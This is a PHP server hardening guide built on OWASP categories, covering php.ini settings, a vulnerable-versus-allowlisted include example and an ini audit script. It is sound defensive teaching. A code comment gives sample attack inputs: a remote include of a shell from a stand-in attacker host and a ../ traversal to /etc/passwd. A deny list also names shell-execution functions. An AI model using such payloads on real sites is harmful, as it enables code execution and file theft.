Web Server Hardening - PHP
1. Secure PHP Configuration in php.ini
1.1 OWASP A2:2017 - Broken Authentication
Changing the Session File Path
session.save_path="C:\xampp\tmp"
The session directory must be outside the web root and writable only by the web-server account. A shared, world-readable directory (the usual /tmp on a multi-user host) lets other local users read the session files and hijack sessions.
1.2 OWASP A3:2017 - Sensitive Data Exposure
Error Reporting For Production
error_reporting=E_ALL
display_errors=Off
log_errors=On
Report everything, but send it to the log rather than to the HTTP response: with display_errors=On, file paths, query fragments and stack traces are returned to the client.
Disable PHP version output
expose_php=Off
1.3 OWASP A5:2017 - Broken Access Control
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
CWE-639: Authorization Bypass Through User-Controlled Key
Disable Remote File Includes
allow_url_fopen = Off
allow_url_include = Off
allow_url_include=Off stops include/require of URL wrappers (CWE-98). allow_url_fopen=Off is stricter: it also stops fopen()/file_get_contents() on http:// and similar wrappers, which breaks applications that fetch remote resources that way (use cURL instead). Neither setting prevents traversal into local files (CWE-22); that has to be handled by validating the include path in code.
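The difference between the two CWEs above is easiest to see in code. The following is an added example, not code from the original page or from the OWASP cheat sheet: the page names, file paths and the ?page= request parameter are assumptions. It shows the include pattern that allow_url_include=Off protects against, why the same code still leaks local files, and the allowlist form that fixes both.

```php
<?php
// Added example (not from the original page or the OWASP cheat sheet).
// Shows why the allow_url_* directives above are only half of the fix:
// allow_url_include=Off blocks remote includes (CWE-98) but does nothing
// against local path traversal (CWE-22); only code-level allowlisting does.
// The page names, file paths and the ?page= parameter are assumptions.

declare(strict_types=1);

// VULNERABLE: untrusted input becomes the include path.
//   allow_url_include=On :  ?page=http://attacker.example/shell.txt  -> remote code execution
//   allow_url_include=Off:  ?page=../../../../etc/passwd             -> still discloses local files
function render_page_vulnerable(string $page): void
{
    include $page;
}

// HARDENED: the request value is only ever a key into a fixed map; the
// filesystem path never contains user input, so '../' and URLs are irrelevant.
const PAGE_ALLOWLIST = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function render_page_hardened(string $page): void
{
    if (!array_key_exists($page, PAGE_ALLOWLIST)) {
        http_response_code(404);
        exit('Unknown page');
    }
    include PAGE_ALLOWLIST[$page];
}

// Entry point: default to 'home' when the parameter is absent.
render_page_hardened((string) ($_GET['page'] ?? 'home'));
```

Appending a fixed suffix such as '.php' to the user value in the vulnerable version does not help: the '../' traversal still works, and the php.ini setting is irrelevant to it. Keep the mapping in code and treat the two allow_url_* directives as defence in depth.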
1.4 OWASP A6:2017 - Security Misconfiguration
Disable Unused PHP Functions
disable_functions = system, exec, shell_exec, passthru, phpinfo, show_source, popen, proc_open
disable_functions only applies to internal functions and cannot be changed at runtime, so it has to be set in php.ini.
Disable Global Variables
register_globals=Off
register_globals was removed in PHP 5.4, so this line only matters for legacy PHP 5.3 or older installations; on current versions the directive no longer exists and PHP logs a startup warning that it is no longer available.
Restrict File Uploads
file_uploads=Off
upload_tmp_dir="C:\securelocation"
upload_max_filesize=2M
Use file_uploads=Off only when the application never accepts uploads. Otherwise keep it On and rely on the other two lines: a temporary directory outside the web root and a size cap. post_max_size must be at least as large as upload_max_filesize, or the request is rejected before the file reaches the application.
1.5 OWASP A7:2017 - Cross Site Scripting (XSS)
CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute
CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag
Set the HttpOnly and Secure Flags on the Session Cookie
session.cookie_httponly = True
session.cookie_secure = True
HttpOnly keeps document.cookie from reading the session ID, which limits what a successful XSS can steal; it does not prevent the XSS itself. cookie_secure means the browser only sends the cookie over HTTPS, so the site must actually be served over TLS or sessions will not work.
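The directives in section 1 are easy to get subtly wrong (a "1" versus "On", a size in the wrong unit, a function missing from the comma-separated list). As an added example, not code from the page, the OWASP cheat sheet or the pcc tool referenced below, the following PHP 8 script re-checks the running interpreter against those directives via ini_get(). The CLI and the web SAPI can load different php.ini files, so run it under the SAPI being hardened (for example from a non-public admin script); the 2M upload cap is taken from the page and the Windows paths are not checked.

```php
<?php
// Added example, not from the original page, the OWASP cheat sheet or pcc.
// Re-checks the section 1 directives in the running interpreter. Note the CLI
// and the web SAPI may load different php.ini files; run this under the SAPI
// you are actually hardening (e.g. from a non-public admin script).
// Assumptions: PHP 8+, the 2M upload cap from the page; paths are not checked.

declare(strict_types=1);

// ini_get() returns raw strings ("0", "", "Off", "1", "On", ...); normalise to bool.
function ini_bool(string $directive): bool
{
    return filter_var((string) ini_get($directive), FILTER_VALIDATE_BOOLEAN);
}

// Convert php.ini shorthand (2M, 512K, 1G) to bytes.
function ini_bytes(string $directive): int
{
    $raw = trim((string) ini_get($directive));
    $num = (int) $raw;                      // leading digits only; "2M" -> 2
    return match (strtoupper(substr($raw, -1))) {
        'G'     => $num * 1024 ** 3,
        'M'     => $num * 1024 ** 2,
        'K'     => $num * 1024,
        default => $num,
    };
}

// Returns a list of findings; an empty list means every check passed.
function audit_php_ini(): array
{
    $findings = [];

    foreach (['display_errors', 'expose_php', 'allow_url_fopen', 'allow_url_include'] as $d) {
        if (ini_bool($d)) {
            $findings[] = "$d should be Off";
        }
    }
    foreach (['log_errors', 'session.cookie_httponly', 'session.cookie_secure'] as $d) {
        if (!ini_bool($d)) {
            $findings[] = "$d should be On";
        }
    }
    if (error_reporting() !== E_ALL) {
        $findings[] = 'error_reporting should be E_ALL';
    }

    // disable_functions is a comma-separated list and cannot be changed at runtime.
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    foreach (['system', 'exec', 'shell_exec', 'passthru', 'phpinfo', 'show_source', 'popen', 'proc_open'] as $fn) {
        if (!in_array($fn, $disabled, true)) {
            $findings[] = "$fn is not listed in disable_functions";
        }
    }

    // Upload limits only matter when uploads are enabled at all.
    if (ini_bool('file_uploads')) {
        if (ini_bytes('upload_max_filesize') > 2 * 1024 ** 2) {
            $findings[] = 'upload_max_filesize exceeds 2M';
        }
        if (ini_bytes('post_max_size') < ini_bytes('upload_max_filesize')) {
            $findings[] = 'post_max_size is smaller than upload_max_filesize';
        }
    }
    return $findings;
}

$findings = audit_php_ini();
echo $findings === [] ? 'php.ini hardening checks passed' : implode(PHP_EOL, $findings);
echo PHP_EOL;
exit($findings === [] ? 0 : 1);
```

The non-zero exit status makes the script usable as a deployment gate; register_globals is deliberately not checked because the directive no longer exists on PHP 5.4 and later.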
2. PHP Configuration Assessment Tool
SektionEins GmbH - PHP Secure Configuration Checker
https://github.com/sektioneins/pcc
3. PHP Security Extension
Suhosin
https://suhosin.org/stories/index.html
Suhosin targets the PHP 5 series; there is no stable release for PHP 7 or later, so on current versions the php.ini hardening above and a supported PHP release are the controls to rely on.
Reference:
OWASP - PHP Configuration Cheat Sheet